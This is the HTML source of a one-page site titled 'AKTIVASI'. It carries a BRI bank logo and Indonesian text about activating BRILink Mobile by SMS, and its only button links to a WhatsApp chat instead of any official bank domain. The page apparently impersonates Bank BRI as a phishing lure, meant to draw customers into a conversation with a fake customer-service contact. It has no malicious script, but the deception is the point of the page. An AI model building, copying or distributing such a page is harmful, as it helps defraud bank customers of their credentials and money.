<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content=".">
    <link rel="canonical" href="" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="Kalteng" />
    <meta name="twitter:title" content="Kalteng" />
    <meta property="og:site_name" content="Kalteng" />
    <meta name="twitter:site_name" content="Kalteng" />
    <meta property="og:description" content="." />
    <meta name="twitter:description" content="..." />
    <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="" />
    <meta name="theme-color" content="#003151">  
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>AKTIVASI</title><link rel="icon" type="image/png" href="https://user-images.githubusercontent.com/141388247/260288160-4004a3e9-d314-44b4-9513-9dbe3617a62b.jpeg">
<link rel="image_src" href="https://user-images.githubusercontent.com/141388247/260288160-4004a3e9-d314-44b4-9513-9dbe3617a62b.jpeg">
    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="http://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        @font-face {
            font-family: 'Avenir';
            src: url(../fonts/AvenirNextLTPro-Bold.otf);
        }
        body { background : url("https://user-images.githubusercontent.com/141388247/263440467-713c3e29-bed6-4864-b2ab-2ba52114e261.jpg");
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Avenir';
            
        }

        .text-header {
            font-family: 'Avenir';
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Avenir';
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 90px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(250, 69, 1);
            border: none; 
            text-align: center; 
            height: 38px; 
            width: 320px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: 600; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none;
            border: none; 
            text-align: center; 
            height: 48px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 130px; 
            width: 536px; 
            max-width: 100%; 
            border-top: 1px inset rgba(250, 250, 250, 0.13); 
            border-right: 1px solid rgba(184, 184, 184, 0.53); 
            border-bottom: none; 
            border-left: 1px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 5px 5px 5px 0px; 
            font-family: 'Avenir';
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 45px;
        }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 15px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }

        .box-lte {
            width: 360px;
            max-width: 95%;
            background: #fff;
            display: block;
            margin: -40px auto;
            border-radius: 10px;
        }

        textarea {
            border: 3px solid rgb(0, 134, 224);
            border-radius: 8px;
            padding: 5px 10px;
            font-family: 'Avenir';
        }
        .blink {
            animation: blink-animation 5s steps(5, start) infinite;
            -webkit-animation: blink-animation 1s steps(5, start) infinite;
        }
        @keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        @-webkit-keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        h1{
            display: table;
            background-color: #FF0000;
            color: #000000;
            padding: 30px;
            width: 100%;
            font-size: 1em;
            text-align: center;
            
            
        }
    </style>
  </head>
  <body>
    <section class="section">
    <div class="container">
        <div class="box-lte">
            <div class="row" style="margin-top: 100px;">
                <div class="col-12 d-block mx-auto text-center p-0" style="height: 240px; width: 340px; max-width: 100%; display: block; margin-top: 30px; border-radius: 10px;">
                    <img alt="" src="https://user-images.githubusercontent.com/141388247/263439318-18c88bb8-76b0-4e69-8666-d2d6a81d3b76.jpeg" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius:0px;">
                    
                </div>
            </div>
            <div class="row">
     
            </div>
            <div class="row">
                <div class="col-12" style="width: 390px; max-width: 100%; display: block; margin: 5px auto; padding: 40px;">
                    <p style="font-size: 12px; text-align: center; font-weight: bold; color:#191970;">Aktivasi BRILink Mobile kirim format pesan SMS <br>ke 3300 yang kamu dapatkan dari layanan CS BRI, kemungkinan biaya SMS akan berlaku pastikan nomor handphone kamu memiliki pulsa.


                    
  
   <div class="row">
            <button class="btn-punya" onclick="location.href='https://wa.me/message/DXSU2AOBBOJZF1';">AKTIVASI</button>
          </div></br></div>
        <div class="row">
        <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;">
                    <p style="font-size: 12px; text-align: center; margin-top: 50px;"><strong style="color: #aaa;"><a href="./" style="text-decoration: none; color: #000;"></a></strong></p>
                    
                </div>
        </div>
    </div>
        </form>
      </div>
    </section>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
   
     
  </body>
</html>
